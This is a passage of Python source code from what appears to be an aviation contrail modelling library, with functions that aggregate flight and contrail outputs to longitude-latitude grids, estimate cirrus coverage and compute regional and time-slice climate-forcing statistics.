\n\n\n# ---------------\n# Gridded outputs\n# ---------------\n\n\ndef longitude_latitude_grid(\n    t_start: np.datetime64 | pd.Timestamp,\n    t_end: np.datetime64 | pd.Timestamp,\n    flight_waypoints: GeoVectorDataset,\n    contrails: GeoVectorDataset,\n    *,\n    met: MetDataset,\n    spatial_bbox: tuple[float, float, float, float] = (-180.0, -90.0, 180.0, 90.0),\n    spatial_grid_res: float = 0.5,\n) -> xr.Dataset:\n    r\"\"\"\n    Aggregate air traffic and contrail outputs to a longitude-latitude grid.\n\n    Parameters\n    ----------\n    t_start : np.datetime64 | pd.Timestamp\n        UTC time at beginning of time step.\n    t_end : np.datetime64 | pd.Timestamp\n        UTC time at end of time step.\n    flight_waypoints : GeoVectorDataset\n        Flight waypoint outputs with contrail summary statistics attached.\n        See :func:`flight_waypoint_summary_statistics`.\n    contrails : GeoVectorDataset\n        Contrail evolution outputs from CoCiP, :attr:`Cocip.contrail`.\n    met : MetDataset\n        Pressure level dataset containing 'air_temperature', 'specific_humidity',\n        'specific_cloud_ice_water_content', and 'geopotential'.\n    spatial_bbox : tuple[float, float, float, float]\n        Spatial bounding box, ``(lon_min, lat_min, lon_max, lat_max)``, [:math:`\\deg`]\n    spatial_grid_res : float\n        Spatial grid resolution, [:math:`\\deg`]\n\n    Returns\n    -------\n    xr.Dataset\n        Air traffic and contrail outputs at a longitude-latitude grid.\n    \"\"\"\n    # Ensure the required columns are included in `flight_waypoints`, `contrails` and `met`\n    flight_waypoints.ensure_vars((\"segment_length\", \"ef\"))\n    contrails.ensure_vars(\n        (\n            \"formation_time\",\n            \"segment_length\",\n            \"width\",\n            \"tau_contrail\",\n            \"rf_sw\",\n            \"rf_lw\",\n            \"rf_net\",\n            \"ef\",\n        )\n    )\n    met.ensure_vars(\n        (\"air_temperature\", \"specific_humidity\", \"specific_cloud_ice_water_content\", \"geopotential\")\n    )\n\n    # Downselect `met` to specified spatial bounding box\n    met = met.downselect(spatial_bbox)\n\n    # Ensure that `flight_waypoints` and `contrails` are within `t_start` and `t_end`\n    is_in_time = flight_waypoints.dataframe[\"time\"].between(t_start, t_end, inclusive=\"right\")\n    if not np.all(is_in_time):\n        warnings.warn(\n            \"Flight waypoints have times that are outside the range of `t_start` and `t_end`. \"\n            \"Waypoints outside the defined time bounds are removed. \"\n        )\n        flight_waypoints = flight_waypoints.filter(is_in_time)\n\n    is_in_time = contrails.dataframe[\"time\"].between(t_start, t_end, inclusive=\"right\")\n\n    if not np.all(is_in_time):\n        warnings.warn(\n            \"Contrail waypoints have times that are outside the range of `t_start` and `t_end`. \"\n            \"Waypoints outside the defined time bounds are removed. 
\"\n )\n contrails = contrails.filter(is_in_time)\n\n # Calculate additional variables\n t_slices = np.unique(contrails[\"time\"])\n dt_integration_sec = (t_slices[1] - t_slices[0]) / np.timedelta64(1, \"s\")\n\n da_area = geo.grid_surface_area(met[\"longitude\"].values, met[\"latitude\"].values)\n\n flight_waypoints[\"persistent_contrails\"] = np.where(\n np.isnan(flight_waypoints[\"ef\"]), 0.0, flight_waypoints[\"segment_length\"]\n )\n\n # ----------------\n # Grid aggregation\n # ----------------\n # (1) Waypoint properties between `t_start` and `t_end`\n is_between_time = flight_waypoints.dataframe[\"time\"].between(t_start, t_end, inclusive=\"right\")\n ds_wypts_t = vector_to_lon_lat_grid(\n flight_waypoints.filter(is_between_time, copy=True),\n agg={\"segment_length\": \"sum\", \"persistent_contrails\": \"sum\", \"ef\": \"sum\"},\n spatial_bbox=spatial_bbox,\n spatial_grid_res=spatial_grid_res,\n )\n\n # (2) Contrail properties at `t_end`\n contrails_t_end = contrails.filter(contrails[\"time\"] == t_end)\n\n contrails_t_end[\"tau_contrail_area\"] = (\n contrails_t_end[\"tau_contrail\"]\n * contrails_t_end[\"segment_length\"]\n * contrails_t_end[\"width\"]\n )\n\n contrails_t_end[\"age\"] = (\n contrails_t_end[\"time\"] - contrails_t_end[\"formation_time\"]\n ) / np.timedelta64(1, \"h\")\n\n ds_contrails_t_end = vector_to_lon_lat_grid(\n contrails_t_end,\n agg={\"segment_length\": \"sum\", \"tau_contrail_area\": \"sum\", \"age\": \"mean\"},\n spatial_bbox=spatial_bbox,\n spatial_grid_res=spatial_grid_res,\n )\n ds_contrails_t_end[\"tau_contrail\"] = ds_contrails_t_end[\"tau_contrail_area\"] / da_area\n\n # (3) Contrail and natural cirrus coverage area at `t_end`\n mds_cirrus_coverage = cirrus_coverage_single_level(t_end, met, contrails)\n ds_cirrus_coverage = mds_cirrus_coverage.data.squeeze(dim=[\"level\", \"time\"])\n\n # (4) Contrail climate forcing between `t_start` and `t_end`\n contrails[\"ef_sw\"] = np.where(\n contrails[\"ef\"] == 0.0,\n 0.0,\n contrails[\"rf_sw\"] * contrails[\"segment_length\"] * contrails[\"width\"] * dt_integration_sec,\n )\n contrails[\"ef_lw\"] = np.where(\n contrails[\"ef\"] == 0.0,\n 0.0,\n contrails[\"rf_lw\"] * contrails[\"segment_length\"] * contrails[\"width\"] * dt_integration_sec,\n )\n\n ds_forcing = vector_to_lon_lat_grid(\n contrails,\n agg={\"ef_sw\": \"sum\", \"ef_lw\": \"sum\", \"ef\": \"sum\"},\n spatial_bbox=spatial_bbox,\n spatial_grid_res=spatial_grid_res,\n )\n ds_forcing[\"rf_sw\"] = ds_forcing[\"ef_sw\"] / (da_area * dt_integration_sec)\n ds_forcing[\"rf_lw\"] = ds_forcing[\"ef_lw\"] / (da_area * dt_integration_sec)\n ds_forcing[\"rf_net\"] = ds_forcing[\"ef\"] / (da_area * dt_integration_sec)\n\n # -----------------------\n # Package gridded outputs\n # -----------------------\n ds = xr.Dataset(\n data_vars=dict(\n flight_distance_flown=ds_wypts_t[\"segment_length\"] / 1000.0,\n persistent_contrails_formed=ds_wypts_t[\"persistent_contrails\"] / 1000.0,\n persistent_contrails=ds_contrails_t_end[\"segment_length\"] / 1000.0,\n tau_contrail=ds_contrails_t_end[\"tau_contrail\"],\n contrail_age=ds_contrails_t_end[\"age\"],\n cc_natural_cirrus=ds_cirrus_coverage[\"natural_cirrus\"],\n cc_contrails=ds_cirrus_coverage[\"contrails\"],\n cc_contrails_clear_sky=ds_cirrus_coverage[\"contrails_clear_sky\"],\n rf_sw=ds_forcing[\"rf_sw\"] * 1000.0,\n rf_lw=ds_forcing[\"rf_lw\"] * 1000.0,\n rf_net=ds_forcing[\"rf_net\"] * 1000.0,\n ef=ds_forcing[\"ef\"],\n ef_initial_loc=ds_wypts_t[\"ef\"],\n ),\n coords=ds_wypts_t.coords,\n )\n ds = 
ds.fillna(0.0)\n    ds = ds.expand_dims({\"time\": np.array([t_end])})\n\n    # Assign attributes\n    attrs = _create_attributes()\n\n    for name in ds.data_vars:\n        ds[name].attrs = attrs[name]\n\n    return ds
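\n\n\n# A hedged usage sketch for the gridder above (illustrative only): the inputs are\n# assumed to be one hour of CoCiP outputs together with the pressure-level `met`\n# data used to run the model, and the timestamps are hypothetical.\n\n\ndef _example_lon_lat_grid(waypoints, contrails, met):\n    \"\"\"Aggregate one hour of outputs to a 1 degree grid (illustrative sketch).\"\"\"\n    return longitude_latitude_grid(\n        pd.Timestamp(\"2022-01-01 00:00\"),\n        pd.Timestamp(\"2022-01-01 01:00\"),\n        waypoints,\n        contrails,\n        met=met,\n        spatial_grid_res=1.0,\n    )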
\n\n\ndef _create_attributes() -> dict[Hashable, dict[str, str]]:\n    return {\n        \"flight_distance_flown\": {\n            \"long_name\": \"Total flight distance flown between t_start and t_end\",\n            \"units\": \"km\",\n        },\n        \"persistent_contrails_formed\": {\n            \"long_name\": \"Persistent contrails formed between t_start and t_end\",\n            \"units\": \"km\",\n        },\n        \"persistent_contrails\": {\n            \"long_name\": \"Persistent contrails at t_end\",\n            \"units\": \"km\",\n        },\n        \"tau_contrail\": {\n            \"long_name\": \"Area-normalised mean contrail optical depth at t_end\",\n            \"units\": \" \",\n        },\n        \"contrail_age\": {\n            \"long_name\": \"Mean contrail age at t_end\",\n            \"units\": \"h\",\n        },\n        \"cc_natural_cirrus\": {\n            \"long_name\": \"Natural cirrus cover at t_end\",\n            \"units\": \" \",\n        },\n        \"cc_contrails\": {\n            \"long_name\": \"Contrail cirrus cover at t_end\",\n            \"units\": \" \",\n        },\n        \"cc_contrails_clear_sky\": {\n            \"long_name\": \"Contrail cirrus cover under clear sky conditions at t_end\",\n            \"units\": \" \",\n        },\n        \"rf_sw\": {\n            \"long_name\": \"Mean contrail cirrus shortwave radiative forcing at t_end\",\n            \"units\": \"mW/m**2\",\n        },\n        \"rf_lw\": {\n            \"long_name\": \"Mean contrail cirrus longwave radiative forcing at t_end\",\n            \"units\": \"mW/m**2\",\n        },\n        \"rf_net\": {\n            \"long_name\": \"Mean contrail cirrus net radiative forcing at t_end\",\n            \"units\": \"mW/m**2\",\n        },\n        \"ef\": {\n            \"long_name\": \"Total contrail energy forcing between t_start and t_end\",\n            \"units\": \"J\",\n        },\n        \"ef_initial_loc\": {\n            \"long_name\": \"Total contrail energy forcing attributed back to the flight waypoint.\",\n            \"units\": \"J\",\n        },\n        \"contrails_clear_sky\": {\n            \"long_name\": \"Contrail cirrus cover in clear sky conditions.\",\n            \"units\": \" \",\n        },\n        \"natural_cirrus\": {\n            \"long_name\": \"Natural cirrus cover.\",\n            \"units\": \" \",\n        },\n        \"contrails\": {\n            \"long_name\": \"Contrail cirrus cover without overlap with natural cirrus.\",\n            \"units\": \" \",\n        },\n    }\n\n\ndef cirrus_coverage_single_level(\n    time: np.datetime64 | pd.Timestamp,\n    met: MetDataset,\n    contrails: GeoVectorDataset,\n    *,\n    optical_depth_threshold: float = 0.1,\n) -> MetDataset:\n    \"\"\"\n    Identify presence of contrail and natural cirrus in a longitude-latitude grid.\n\n    Parameters\n    ----------\n    time : np.datetime64 | pd.Timestamp\n        Time at which the cirrus statistics are computed.\n    met : MetDataset\n        Pressure level dataset containing 'air_temperature', 'specific_cloud_ice_water_content',\n        and 'geopotential' fields.\n    contrails : GeoVectorDataset\n        Contrail waypoints containing 'tau_contrail' field.\n    optical_depth_threshold : float\n        Sensitivity of cirrus detection, set at 0.1 to match the capability of satellites.\n\n    Returns\n    -------\n    MetDataset\n        Single level dataset containing the contrail and natural cirrus coverage.\n    \"\"\"\n    # Ensure `met` and `contrails` contain the required variables\n    met.ensure_vars((\"air_temperature\", \"specific_cloud_ice_water_content\", \"geopotential\"))\n    contrails.ensure_vars(\"tau_contrail\")\n\n    # Spatial bounding box and resolution of `met`\n    spatial_bbox = (\n        np.min(met[\"longitude\"].values),\n        np.min(met[\"latitude\"].values),\n        np.max(met[\"longitude\"].values),\n        np.max(met[\"latitude\"].values),\n    )\n    spatial_grid_res = np.diff(met[\"longitude\"].values)[0]\n\n    # Contrail cirrus optical depth in a longitude-latitude grid\n    tau_contrail = vector_to_lon_lat_grid(\n        contrails.filter(contrails[\"time\"] == time),\n        agg={\"tau_contrail\": \"sum\"},\n        spatial_bbox=spatial_bbox,\n        spatial_grid_res=spatial_grid_res,\n    )[\"tau_contrail\"]\n    tau_contrail = tau_contrail.expand_dims({\"level\": np.array([-1])})\n    tau_contrail = tau_contrail.expand_dims({\"time\": np.array([time])})\n    mda_tau_contrail = MetDataArray(tau_contrail)\n\n    # Natural cirrus optical depth in a longitude-latitude grid\n    met[\"tau_cirrus\"] = tau_cirrus(met)\n    tau_cirrus_max = met[\"tau_cirrus\"].data.sel(level=met[\"level\"].data[-1], time=time)\n    tau_cirrus_max = tau_cirrus_max.expand_dims({\"level\": np.array([-1])})\n    tau_cirrus_max = tau_cirrus_max.expand_dims({\"time\": np.array([time])})\n    mda_tau_cirrus_max = MetDataArray(tau_cirrus_max)\n    mda_tau_all = MetDataArray(mda_tau_contrail.data + mda_tau_cirrus_max.data)\n\n    # Contrail and natural cirrus coverage in a longitude-latitude grid\n    mda_cc_contrails_clear_sky = optical_depth_to_cirrus_coverage(\n        mda_tau_contrail, threshold=optical_depth_threshold\n    )\n    mda_cc_natural_cirrus = optical_depth_to_cirrus_coverage(\n        mda_tau_cirrus_max, threshold=optical_depth_threshold\n    )\n    mda_cc_total = optical_depth_to_cirrus_coverage(mda_tau_all, threshold=optical_depth_threshold)\n    mda_cc_contrails = MetDataArray(mda_cc_total.data - mda_cc_natural_cirrus.data)\n\n    # Concatenate data\n    ds = xr.Dataset(\n        data_vars=dict(\n            contrails_clear_sky=mda_cc_contrails_clear_sky.data,\n            natural_cirrus=mda_cc_natural_cirrus.data,\n            contrails=mda_cc_contrails.data,\n        ),\n        coords=mda_cc_contrails_clear_sky.coords,\n    )\n\n    # Update attributes\n    attrs = _create_attributes()\n\n    for name in ds.data_vars:\n        ds[name].attrs = attrs[name]\n\n    return MetDataset(ds)\n\n\ndef optical_depth_to_cirrus_coverage(\n    optical_depth: MetDataArray,\n    *,\n    threshold: float = 0.1,\n) -> MetDataArray:\n    \"\"\"\n    Calculate contrail or natural cirrus coverage in a longitude-latitude grid.\n\n    A grid cell is assumed to be covered by cirrus if the optical depth is above ``threshold``.\n\n    Parameters\n    ----------\n    optical_depth : MetDataArray\n        Contrail or natural cirrus optical depth in a longitude-latitude grid\n    threshold : float\n        Sensitivity of cirrus detection, set at 0.1 to match the capability of satellites.\n\n    Returns\n    -------\n    MetDataArray\n        Contrail or natural cirrus coverage in a longitude-latitude grid\n    \"\"\"\n    cirrus_cover = (optical_depth.data > threshold).astype(int)\n    return MetDataArray(cirrus_cover)\n\n\ndef regional_statistics(da_var: xr.DataArray, *, agg: str) -> pd.Series:\n    \"\"\"\n    Calculate regional statistics from longitude-latitude grid.\n\n    Parameters\n    ----------\n    da_var : xr.DataArray\n        Air traffic or contrail variable in a longitude-latitude grid.\n    agg : str\n        Aggregation function, either \"sum\" or \"mean\".\n\n    Returns\n    -------\n    pd.Series\n        Regional statistics\n\n    Notes\n    -----\n    - The spatial bounding box for each region is defined in Teoh et al. 
(2023)\n    - Teoh, R., Engberg, Z., Shapiro, M., Dray, L., and Stettler, M.: A high-resolution Global\n      Aviation emissions Inventory based on ADS-B (GAIA) for 2019–2021, EGUsphere [preprint],\n      https://doi.org/10.5194/egusphere-2023-724, 2023.\n    \"\"\"\n    if (agg == \"mean\") and (len(da_var.time) > 1):\n        da_var = da_var.mean(dim=[\"time\"])\n        da_var = da_var.fillna(0.0)\n\n    # Get regional domain\n    vars_regional = _regional_data_arrays(da_var)\n\n    if agg == \"sum\":\n        vals = {\n            \"World\": np.nansum(vars_regional[\"world\"].values),\n            \"USA\": np.nansum(vars_regional[\"usa\"].values),\n            \"Europe\": np.nansum(vars_regional[\"europe\"].values),\n            \"East Asia\": np.nansum(vars_regional[\"east_asia\"].values),\n            \"SEA\": np.nansum(vars_regional[\"sea\"].values),\n            \"Latin America\": np.nansum(vars_regional[\"latin_america\"].values),\n            \"Africa\": np.nansum(vars_regional[\"africa\"].values),\n            \"China\": np.nansum(vars_regional[\"china\"].values),\n            \"India\": np.nansum(vars_regional[\"india\"].values),\n            \"North Atlantic\": np.nansum(vars_regional[\"n_atlantic\"].values),\n            \"North Pacific\": np.nansum(vars_regional[\"n_pacific_1\"].values) + np.nansum(\n                vars_regional[\"n_pacific_2\"].values\n            ),\n            \"Arctic\": np.nansum(vars_regional[\"arctic\"].values),\n        }\n    elif agg == \"mean\":\n        area_world = geo.grid_surface_area(da_var[\"longitude\"].values, da_var[\"latitude\"].values)\n        area_regional = _regional_data_arrays(area_world)\n\n        vals = {\n            \"World\": _area_mean_properties(vars_regional[\"world\"], area_regional[\"world\"]),\n            \"USA\": _area_mean_properties(vars_regional[\"usa\"], area_regional[\"usa\"]),\n            \"Europe\": _area_mean_properties(vars_regional[\"europe\"], area_regional[\"europe\"]),\n            \"East Asia\": _area_mean_properties(\n                vars_regional[\"east_asia\"], area_regional[\"east_asia\"]\n            ),\n            \"SEA\": _area_mean_properties(vars_regional[\"sea\"], area_regional[\"sea\"]),\n            \"Latin America\": _area_mean_properties(\n                vars_regional[\"latin_america\"], area_regional[\"latin_america\"]\n            ),\n            \"Africa\": _area_mean_properties(vars_regional[\"africa\"], area_regional[\"africa\"]),\n            \"China\": _area_mean_properties(vars_regional[\"china\"], area_regional[\"china\"]),\n            \"India\": _area_mean_properties(vars_regional[\"india\"], area_regional[\"india\"]),\n            \"North Atlantic\": _area_mean_properties(\n                vars_regional[\"n_atlantic\"], area_regional[\"n_atlantic\"]\n            ),\n            \"North Pacific\": 0.4 * _area_mean_properties(\n                vars_regional[\"n_pacific_1\"], area_regional[\"n_pacific_1\"]\n            ) + 0.6 * _area_mean_properties(\n                vars_regional[\"n_pacific_2\"], area_regional[\"n_pacific_2\"]\n            ),\n            \"Arctic\": _area_mean_properties(vars_regional[\"arctic\"], area_regional[\"arctic\"]),\n        }\n    else:\n        raise NotImplementedError('Aggregation only accepts operations of \"mean\" or \"sum\".')\n\n    return pd.Series(vals)
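\n\n\n# `regional_statistics` consumes a single variable from the gridded dataset built\n# by `longitude_latitude_grid`. A sketch (illustrative only; ``ds`` is assumed to\n# be that gridded output): extensive quantities such as ``ef`` are summed per\n# region, while intensive quantities such as ``tau_contrail`` use the\n# area-weighted mean.\n\n\ndef _example_regional_stats(ds):\n    \"\"\"Compute regional totals and means from a gridded output (illustrative sketch).\"\"\"\n    ef_by_region = regional_statistics(ds[\"ef\"], agg=\"sum\")\n    tau_by_region = regional_statistics(ds[\"tau_contrail\"], agg=\"mean\")\n    return pd.DataFrame({\"ef\": ef_by_region, \"tau_contrail\": tau_by_region})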
\n\n\ndef _regional_data_arrays(da_global: xr.DataArray) -> dict[str, xr.DataArray]:\n    \"\"\"\n    Extract regional data arrays from global data array.\n\n    Parameters\n    ----------\n    da_global : xr.DataArray\n        Global air traffic or contrail variable in a longitude-latitude grid.\n\n    Returns\n    -------\n    dict[str, xr.DataArray]\n        Regional data arrays.\n\n    Notes\n    -----\n    - The spatial bounding box for each region is defined in Teoh et al. (2023)\n    - Teoh, R., Engberg, Z., Shapiro, M., Dray, L., and Stettler, M.: A high-resolution Global\n      Aviation emissions Inventory based on ADS-B (GAIA) for 2019–2021, EGUsphere [preprint],\n      https://doi.org/10.5194/egusphere-2023-724, 2023.\n    \"\"\"\n    return {\n        \"world\": da_global.copy(),\n        \"usa\": da_global.sel(longitude=slice(-126.0, -66.0), latitude=slice(23.0, 50.0)),\n        \"europe\": da_global.sel(longitude=slice(-12.0, 20.0), latitude=slice(35.0, 60.0)),\n        \"east_asia\": da_global.sel(longitude=slice(103.0, 150.0), latitude=slice(15.0, 48.0)),\n        \"sea\": da_global.sel(longitude=slice(87.5, 130.0), latitude=slice(-10.0, 20.0)),\n        \"latin_america\": da_global.sel(longitude=slice(-85.0, -35.0), latitude=slice(-60.0, 15.0)),\n        \"africa\": da_global.sel(longitude=slice(-20.0, 50.0), latitude=slice(-35.0, 40.0)),\n        \"china\": da_global.sel(longitude=slice(73.5, 135.0), latitude=slice(18.0, 53.5)),\n        \"india\": da_global.sel(longitude=slice(68.0, 97.5), latitude=slice(8.0, 35.5)),\n        \"n_atlantic\": da_global.sel(longitude=slice(-70.0, -5.0), latitude=slice(40.0, 63.0)),\n        \"n_pacific_1\": da_global.sel(longitude=slice(-180.0, -140.0), latitude=slice(35.0, 65.0)),\n        \"n_pacific_2\": da_global.sel(longitude=slice(120.0, 180.0), latitude=slice(35.0, 65.0)),\n        \"arctic\": da_global.sel(latitude=slice(66.5, 90.0)),\n    }\n\n\ndef _area_mean_properties(da_var_region: xr.DataArray, da_area_region: xr.DataArray) -> float:\n    \"\"\"\n    Calculate area-mean properties.\n\n    Parameters\n    ----------\n    da_var_region : xr.DataArray\n        Regional air traffic or contrail variable in a longitude-latitude grid.\n    da_area_region : xr.DataArray\n        Regional surface area in a longitude-latitude grid.\n\n    Returns\n    -------\n    float\n        Area-mean properties\n    \"\"\"\n    return np.nansum(da_var_region.values * da_area_region.values) / np.nansum(\n        da_area_region.values\n    )\n\n\n# ---------------------\n# Time-slice statistics\n# ---------------------\n\n\ndef time_slice_statistics(\n    t_start: np.datetime64 | pd.Timestamp,\n    t_end: np.datetime64 | pd.Timestamp,\n    flight_waypoints: GeoVectorDataset,\n    contrails: GeoVectorDataset,\n    *,\n    humidity_scaling: HumidityScaling,\n    met: MetDataset | None = None,\n    rad: MetDataset | None = None,\n    spatial_bbox: tuple[float, float, float, float] = (-180.0, -90.0, 180.0, 90.0),\n) -> pd.Series:\n    r\"\"\"\n    Calculate the flight and contrail summary statistics between `t_start` and `t_end`.\n\n    Parameters\n    ----------\n    t_start : np.datetime64 | pd.Timestamp\n        UTC time at beginning of time step.\n    t_end : np.datetime64 | pd.Timestamp\n        UTC time at end of time step.\n    flight_waypoints : GeoVectorDataset\n        Flight waypoint outputs.\n    contrails : GeoVectorDataset\n        Contrail evolution outputs from CoCiP, `cocip.contrail`.\n    humidity_scaling : HumidityScaling\n        Humidity scaling methodology.\n        See :attr:`CocipParams.humidity_scaling`\n    met : MetDataset | None\n        Pressure level dataset containing 'air_temperature', 'specific_humidity',\n        'specific_cloud_ice_water_content', and 'geopotential'.\n        Meteorological statistics will not be computed if `None` is provided.\n    rad : MetDataset | None\n        Single level dataset containing the `sdr`, `rsr` and `olr`. Radiation statistics\n        will not be computed if `None` is provided.\n    spatial_bbox : tuple[float, float, float, float]\n        Spatial bounding box, `(lon_min, lat_min, lon_max, lat_max)`, [:math:`\\deg`]\n\n    Returns\n    -------\n    pd.Series\n        Flight and contrail summary statistics. 
Contrail statistics are provided at `t_end`.\n The units for each output are outlined in `Notes`.\n\n Notes\n -----\n Outputs and units:\n - ``n_flights``, [dimensionless]\n - ``n_flights_forming_contrails``, [dimensionless]\n - ``n_flights_forming_persistent_contrails``, [dimensionless]\n - ``n_flights_with_persistent_contrails_at_t_end``, [dimensionless]\n\n - ``n_waypoints``, [dimensionless]\n - ``n_waypoints_forming_contrails``, [dimensionless]\n - ``n_waypoints_forming_persistent_contrails``, [dimensionless]\n - ``n_waypoints_with_persistent_contrails_at_t_end``, [dimensionless]\n - ``n_contrail_waypoints_at_night``, [dimensionless]\n - ``pct_contrail_waypoints_at_night``, [%]\n\n - ``total_flight_distance``, [:math:`km`]\n - ``total_contrails_formed``, [:math:`km`]\n - ``total_persistent_contrails_formed``, [:math:`km`]\n - ``total_persistent_contrails_at_t_end``, [:math:`km`]\n\n - ``total_fuel_burn``, [:math:`kg`]\n - ``mean_propulsion_efficiency_all_flights``, [dimensionless]\n - ``mean_propulsion_efficiency_flights_with_persistent_contrails``, [dimensionless]\n - ``mean_nvpm_ei_n_all_flights``, [:math:`kg^{-1}`]\n - ``mean_nvpm_ei_n_flights_with_persistent_contrails``, [:math:`kg^{-1}`]\n\n - ``mean_contrail_age``, [:math:`h`]\n - ``max_contrail_age``, [:math:`h`]\n - ``mean_n_ice_per_m``, [:math:`m^{-1}`]\n - ``mean_contrail_ice_water_path``, [:math:`kg m^{-2}`]\n - ``area_mean_contrail_ice_radius``, [:math:`\\mu m`]\n - ``volume_mean_contrail_ice_radius``, [:math:`\\mu m`]\n - ``mean_contrail_ice_effective_radius``, [:math:`\\mu m`]\n - ``mean_tau_contrail``, [dimensionless]\n - ``mean_tau_cirrus``, [dimensionless]\n\n - ``mean_rf_sw``, [:math:`W m^{-2}`]\n - ``mean_rf_lw``, [:math:`W m^{-2}`]\n - ``mean_rf_net``, [:math:`W m^{-2}`]\n - ``total_contrail_ef``, [:math:`J`]\n\n - ``issr_percentage_coverage``, [%]\n - ``mean_rhi_in_issr``, [dimensionless]\n - ``contrail_cirrus_percentage_coverage``, [%]\n - ``contrail_cirrus_clear_sky_percentage_coverage``, [%]\n - ``natural_cirrus_percentage_coverage``, [%]\n - ``cloud_contrail_overlap_percentage``, [%]\n\n - ``mean_sdr_domain``, [:math:`W m^{-2}`]\n - ``mean_sdr_at_contrail_wypts``, [:math:`W m^{-2}`]\n - ``mean_rsr_domain``, [:math:`W m^{-2}`]\n - ``mean_rsr_at_contrail_wypts``, [:math:`W m^{-2}`]\n - ``mean_olr_domain``, [:math:`W m^{-2}`]\n - ``mean_olr_at_contrail_wypts``, [:math:`W m^{-2}`]\n - ``mean_albedo_at_contrail_wypts``, [dimensionless]\n \"\"\"\n # Ensure the required columns are included in `flight_waypoints`, `contrails`, `met` and `rad`\n flight_waypoints.ensure_vars(\n (\n \"flight_id\",\n \"segment_length\",\n \"true_airspeed\",\n \"fuel_flow\",\n \"engine_efficiency\",\n \"nvpm_ei_n\",\n \"sac\",\n \"persistent_1\",\n )\n )\n contrails.ensure_vars(\n (\n \"flight_id\",\n \"segment_length\",\n \"air_temperature\",\n \"iwc\",\n \"r_ice_vol\",\n \"n_ice_per_m\",\n \"tau_contrail\",\n \"tau_cirrus\",\n \"width\",\n \"area_eff\",\n \"sdr\",\n \"rsr\",\n \"olr\",\n \"rf_sw\",\n \"rf_lw\",\n \"rf_net\",\n \"ef\",\n )\n )\n\n # Ensure that the waypoints are within `t_start` and `t_end`\n is_in_time = flight_waypoints.dataframe[\"time\"].between(t_start, t_end, inclusive=\"right\")\n\n if not np.all(is_in_time):\n warnings.warn(\n \"Flight waypoints have times that are outside the range of `t_start` and `t_end`. \"\n \"Waypoints outside the defined time bounds are removed. 
\"\n        )\n        flight_waypoints = flight_waypoints.filter(is_in_time)\n\n    is_in_time = contrails.dataframe[\"time\"].between(t_start, t_end, inclusive=\"right\")\n    if not np.all(is_in_time):\n        warnings.warn(\n            \"Contrail waypoints have times that are outside the range of `t_start` and `t_end`. \"\n            \"Waypoints outside the defined time bounds are removed. \"\n        )\n        contrails = contrails.filter(is_in_time)\n\n    # Additional variables\n    flight_waypoints[\"fuel_burn\"] = (\n        flight_waypoints[\"fuel_flow\"]\n        * (1 / flight_waypoints[\"true_airspeed\"])\n        * flight_waypoints[\"segment_length\"]\n    )\n    contrails[\"pressure\"] = units.m_to_pl(contrails[\"altitude\"])\n    contrails[\"rho_air\"] = rho_d(contrails[\"air_temperature\"], contrails[\"pressure\"])\n    contrails[\"plume_mass_per_m\"] = plume_mass_per_distance(\n        contrails[\"area_eff\"], contrails[\"rho_air\"]\n    )\n    contrails[\"age\"] = (contrails[\"time\"] - contrails[\"formation_time\"]) / np.timedelta64(1, \"h\")\n\n    # Meteorology domain statistics\n    if met is not None:\n        met.ensure_vars(\n            (\n                \"air_temperature\",\n                \"specific_humidity\",\n                \"specific_cloud_ice_water_content\",\n                \"geopotential\",\n            )\n        )\n        met = met.downselect(spatial_bbox)\n        met_stats = meteorological_time_slice_statistics(t_end, contrails, met, humidity_scaling)\n\n    # Radiation domain statistics\n    if rad is not None:\n        rad.ensure_vars((\"sdr\", \"rsr\", \"olr\"))\n        rad = rad.downselect(spatial_bbox)\n        rad_stats = radiation_time_slice_statistics(rad, t_end)\n\n    # Calculate time-slice statistics\n    is_sac = flight_waypoints[\"sac\"] == 1.0\n    is_persistent = flight_waypoints[\"persistent_1\"] == 1.0\n    is_at_t_end = contrails[\"time\"] == t_end\n    is_night_time = contrails[\"sdr\"] < 0.1\n    domain_area = geo.domain_surface_area(spatial_bbox)\n\n    stats_t = {\n        \"time_start\": t_start,\n        \"time_end\": t_end,\n        # Flight statistics\n        \"n_flights\": len(flight_waypoints.dataframe[\"flight_id\"].unique()),\n        \"n_flights_forming_contrails\": len(\n            flight_waypoints.filter(is_sac).dataframe[\"flight_id\"].unique()\n        ),\n        \"n_flights_forming_persistent_contrails\": len(\n            flight_waypoints.filter(is_persistent).dataframe[\"flight_id\"].unique()\n        ),\n        \"n_flights_with_persistent_contrails_at_t_end\": len(\n            contrails.filter(is_at_t_end).dataframe[\"flight_id\"].unique()\n        ),\n        # Waypoint statistics\n        \"n_waypoints\": len(flight_waypoints),\n        \"n_waypoints_forming_contrails\": len(flight_waypoints.filter(is_sac)),\n        \"n_waypoints_forming_persistent_contrails\": len(flight_waypoints.filter(is_persistent)),\n        \"n_waypoints_with_persistent_contrails_at_t_end\": len(contrails.filter(is_at_t_end)),\n        \"n_contrail_waypoints_at_night\": len(contrails.filter(is_night_time)),\n        \"pct_contrail_waypoints_at_night\": (\n            len(contrails.filter(is_night_time)) / len(contrails) * 100\n        ),\n        # Distance statistics\n        \"total_flight_distance\": np.nansum(flight_waypoints[\"segment_length\"]) / 1000,\n        \"total_contrails_formed\": (\n            np.nansum(flight_waypoints.filter(is_sac)[\"segment_length\"]) / 1000\n        ),\n        \"total_persistent_contrails_formed\": (\n            np.nansum(flight_waypoints.filter(is_persistent)[\"segment_length\"]) / 1000\n        ),\n        \"total_persistent_contrails_at_t_end\": (\n            np.nansum(contrails.filter(is_at_t_end)[\"segment_length\"]) / 1000\n        ),\n        # Aircraft performance statistics\n        \"total_fuel_burn\": np.nansum(flight_waypoints[\"fuel_burn\"]),\n        \"mean_propulsion_efficiency_all_flights\": np.nanmean(flight_waypoints[\"engine_efficiency\"]),\n        \"mean_propulsion_efficiency_flights_with_persistent_contrails\": (\n            
